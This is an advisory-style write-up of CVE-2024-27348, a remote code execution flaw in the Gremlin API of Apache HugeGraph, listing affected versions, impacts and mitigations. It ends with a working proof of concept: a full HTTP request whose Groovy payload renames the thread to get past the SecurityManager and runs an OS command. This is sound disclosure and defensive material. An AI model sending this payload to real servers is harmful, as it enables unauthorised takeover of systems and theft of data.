Vulnerable Version
= 1.0.0, < 1.3.0 in Java8 & Java11
Fixed Version
1.3.0
Base Score
9.8 Critical
Vendor Description:-
HugeGraph is a powerful, open-source graph database designed to handle large-scale graph data and complex graph queries with high performance. Developed by the team at Baidu, HugeGraph supports a variety of data models and query languages, including Gremlin, Cypher, and SPARQL, allowing for flexible and efficient data management. Its origins trace back to Baidu’s need for a scalable and efficient graph database solution to power its own applications.
CVE-2024-27348 Vulnerability Description:-
A remote code execution vulnerability exists in the Gremlin API of HugeGraph. Gremlin is a graph traversal language that can be implemented in various programming languages such as Groovy, Python, and Java. An attacker is able to use Gremlin API to execute Groovy based Gremlin commands without authentication, which can be used to execute arbitrary commands.
In theory, Apache HugeGraph will use the SecurityManager to restrict the Groovy scripts submitted by users. But the SecurityManager only checks thread names that start with “gremlin-server-exec” or “task-worker”. This mechanism can be bypassed by using reflection to modify the current thread name, allowing arbitrary code execution.
Gremlin:- Gremlin is a versatile graph traversal language integral to the Apache TinkerPop project, enabling efficient and expressive graph queries and analytics across a range of graph databases and computing frameworks.
Impacts:-
- Remote Code Execution (RCE) → Attackers can run arbitrary OS commands, leading to server compromise.
- Data Theft & Manipulation → Sensitive graph database data can be accessed, modified, or deleted.
- Privilege Escalation → If HugeGraph runs with high privileges, attackers may gain control over the entire system.
- Persistence & Lateral Movement → The attacker can establish backdoors and pivot to other internal services.
Mitigations:-
- Apply Patch: The most effective mitigation is to update Apache HugeGraph Server to version 1.3.0 or newer, where the vulnerability has been patched. Regularly check for updates and apply them promptly to ensure that your system is protected against known vulnerabilities.
- Switch to Java 11: Transitioning to Java 11 can enhance security features and provide better protection against such vulnerabilities.
- Gremlin Input Validation: Implement robust server-side input validation to sanitize all incoming Gremlin queries before processing.
- Monitor Activity: Closely monitor your Apache HugeGraph Server instances for any suspicious activity that might indicate exploitation attempts.
- Enable User Authentication: By default, HugeGraph does not enable user authentication. To enable it, modify the configuration file (hugegraph.properties) to set auth.enable=true. Ensure you are using the Java 11 version as it is recommended for enhanced security.
POC:-
Send a Gremlin query through the Gremlin API endpoint to execute arbitrary commands:
POST /gremlin HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/json
Content-Length: 777
{
"gremlin": "Thread thread = Thread.currentThread(); Class clz = Class.forName(\"java.lang.Thread\"); java.lang.reflect.Field field = clz.getDeclaredField(\"name\"); field.setAccessible(true); field.set(thread, \"SL7\"); Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\"); java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class); java.util.List command = java.util.Arrays.asList(\"id\"); Object processBuilderInstance = constructor.newInstance(command); java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\"); org.apache.commons.io.IOUtils.toString(startMethod.invoke(processBuilderInstance).getInputStream());",
"bindings": {},
"language": "gremlin-groovy",
"aliases": {}
}
POC Video :-
Reference:-
https://github.com/vulhub/vulhub/tree/master/hugegraph/CVE-2024-27348